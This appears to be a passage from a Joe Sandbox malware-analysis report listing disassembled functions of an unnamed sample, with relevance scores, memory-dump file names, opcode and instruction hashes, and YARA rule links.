                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                                                                                                      • Instruction ID: 7557f0fa19789e1914fe84686dbcab111e535b14adbe6f97c39b8fcfae748025
                                                                                                                      • Opcode Fuzzy Hash: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
                                                                                                                      • Instruction Fuzzy Hash: EC31B833A1151147E714CA2ACC4479632D2ABD8328F3E86B99429DF7D2CD3B9D0386C0
                                                                                                                      Function 0051E520 Relevance: .1, Instructions: 117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                                                                                                      • Instruction ID: 6c8e4c9673cc15bbc702bed167dcbbb82e3021f105494757b680a4185f8f824a
                                                                                                                      • Opcode Fuzzy Hash: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
                                                                                                                      • Instruction Fuzzy Hash: 5F310A73A197144FD3189D7D988015E7B92ABD5734F2A4B2EDEB54B3C1DE708C409781
                                                                                                                      Function 004FB021 Relevance: .1, Instructions: 114COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cf2d6c8d8e0ce4be24285d9e3cc8b2a5da0c11118c90d4a1c167c7b400d72d4b
                                                                                                                      • Instruction ID: 739af0e99a692309eadeb8d74cc8cedc692a506e124fa41e213c6122d8cb0829
                                                                                                                      • Opcode Fuzzy Hash: cf2d6c8d8e0ce4be24285d9e3cc8b2a5da0c11118c90d4a1c167c7b400d72d4b
                                                                                                                      • Instruction Fuzzy Hash: 1E3126719483918FD718CA34D8A13BBBBD29FA7258F089A2DE0E593391D338C5468B57
                                                                                                                      Function 0050E9B0 Relevance: .1, Instructions: 114COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                                                                                                      • Instruction ID: e730129563667edf1bc61be6b1e3d5319ea018059aaaabacd30aa0c87266efef
                                                                                                                      • Opcode Fuzzy Hash: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
                                                                                                                      • Instruction Fuzzy Hash: 5A315C73E2593807C7088D3D5C1526975C29BC5255F5EC77CEDAA9F3C2DA319C0582D0
                                                                                                                      Function 00511AF5 Relevance: .1, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                                                                                      • Instruction ID: dd3d422b9820cde0565d28f8a2907a4fa0ec3ed37d28419dcf6a9eed71f6a1b6
                                                                                                                      • Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
                                                                                                                      • Instruction Fuzzy Hash: 2C214D6650D7C146EB394B3A84243F6BFE26FE3345F2C48EDD0C8C7282DA7984458716
                                                                                                                      Function 004E8320 Relevance: .1, Instructions: 107COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                                      • Instruction ID: c42640394f6a365b54557dcc83b778698e5375f07056a7a0f2a9eb84f8cbb779
                                                                                                                      • Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
                                                                                                                      • Instruction Fuzzy Hash: A3314B2250D6F34EC733892E449007E7AA09AA621572903FFDCF58B3C3C51AC94597E5
                                                                                                                      Function 004E2B40 Relevance: .1, Instructions: 102COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f528d4b3c967552278f3275d904b5855f1e62e3d7cf0050b42e01489087eda30
                                                                                                                      • Instruction ID: e5db161be7e82be0ed0ed7273944ae3e2dff072f7ffc93796dc53f257c0ae89f
                                                                                                                      • Opcode Fuzzy Hash: f528d4b3c967552278f3275d904b5855f1e62e3d7cf0050b42e01489087eda30
                                                                                                                      • Instruction Fuzzy Hash: 3021F5757181A14BC710CE3ADDD012B77D29B8730671E5976EB80C3312C27AE80FD220
                                                                                                                      Function 004FB3F2 Relevance: .1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c184e0160eb771793c772d2e9d6487315fe5b29c921954bb7a335c44128236fc
                                                                                                                      • Instruction ID: 1494983091d73f4b50e34d108500e3b94e65d9213e8687df41e1bbf2c19d5b52
                                                                                                                      • Opcode Fuzzy Hash: c184e0160eb771793c772d2e9d6487315fe5b29c921954bb7a335c44128236fc
                                                                                                                      • Instruction Fuzzy Hash: 9B31C3716183414BD718CF39C99132BBBE2AB86314F18DA6DD4D1D7385D73C88058B92
                                                                                                                      Function 00510F03 Relevance: .1, Instructions: 79COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: be2b0f9e89781aa11d3826cc5a4ee57261f45db02add5aa5bb12b9e7a3aa055e
                                                                                                                      • Instruction ID: ec7612ce4f910658397f0ded4957f1ddef1fcd371599896d3b81b834d798c422
                                                                                                                      • Opcode Fuzzy Hash: be2b0f9e89781aa11d3826cc5a4ee57261f45db02add5aa5bb12b9e7a3aa055e
                                                                                                                      • Instruction Fuzzy Hash: C921B476D583A04BE3348F359C563DBBBE2ABC6314F19861CC8D857285DB751846CB81
                                                                                                                      Function 0051A230 Relevance: .1, Instructions: 64COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction ID: 7f0a915d7fdfbf9b2a306fd02e5676a43a9ab8f20cdf441e8ef4dce4a05bf86a
                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                      • Instruction Fuzzy Hash: FC11E537A0A1D40ED3178D3C84405E5BFE32AA3735B198399F4B89B2D2D6378DCA8356
                                                                                                                      Function 0050C5E0 Relevance: .1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                                                                      • Instruction ID: 52135ec1392208a3c8dc70e6d8e619e7f5dffd0b9b550db4b67ad7cb5c546a9a
                                                                                                                      • Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                                                                      • Instruction Fuzzy Hash: 2201B5F660074147DF309F1994C173FBEA87F92708F1C562CD9095B282EB7AEC058295
                                                                                                                      Function 00520A90 Relevance: .0, Instructions: 46COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a2550b55cc455260c594c6eb0f3add640bb3abadf4108f579521d0b2a12b655a
                                                                                                                      • Instruction ID: 69b86fe1817a35fcf14fa151764c2a8be6cfcb929804145e982c22dff7130c57
                                                                                                                      • Opcode Fuzzy Hash: a2550b55cc455260c594c6eb0f3add640bb3abadf4108f579521d0b2a12b655a
                                                                                                                      • Instruction Fuzzy Hash: 2BF04432601328ABC2208A08BC89D377BAEFF8F728F505318F514131E2E322ED11D7A1
                                                                                                                      Function 004FF3E0 Relevance: .0, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                      • Instruction ID: f28355eaec6f849839a42ac4d40acf9eadbe306d6c592fadd6b297fd1af502cd
                                                                                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                      • Instruction Fuzzy Hash: A4D0A7615487B50F57588D3C44A047BFBE8ED87712B1814AFE9D2E3246D225DC06469C
                                                                                                                      Function 00505560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0050561D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID: $%$p:#$MO
                                                                                                                      • API String ID: 237503144-3521940197
                                                                                                                      • Opcode ID: b0e3e8429453843ef9b3d54234268cba305dafee33dae8885d7c43f6075915f6
                                                                                                                      • Instruction ID: 267c0b387954108003ba2959605c0c97875530d139a344c88a5eaf2ef7445f6b
                                                                                                                      • Opcode Fuzzy Hash: b0e3e8429453843ef9b3d54234268cba305dafee33dae8885d7c43f6075915f6
                                                                                                                      • Instruction Fuzzy Hash: 7E41B1765183448FE310CF14C89475FBBE2EFC5758F16892CE4D49B680D7B98A0A8B82